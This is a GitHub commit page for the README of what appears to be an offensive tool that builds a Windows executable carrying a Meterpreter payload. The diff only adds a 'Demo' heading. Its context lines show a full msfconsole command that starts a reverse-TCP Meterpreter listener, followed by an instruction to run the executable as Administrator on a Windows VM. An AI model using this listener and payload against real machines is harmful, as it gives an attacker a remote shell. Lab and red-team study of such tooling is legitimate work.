We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 6bd879d commit 2d758fdCopy full SHA for 2d758fd
README.md
@@ -56,8 +56,10 @@ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter
56
57
3. Start listener: ```msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_tcp; set LHOST {args.LHOST}; set LPORT {args.LPORT}; exploit'```
58
4. Run {exe_name} as Administrator on Windows VM
59
+
60
-
61
+# Demo
62
+
63
64
# How It Works
65
Technical Overview
0 commit comments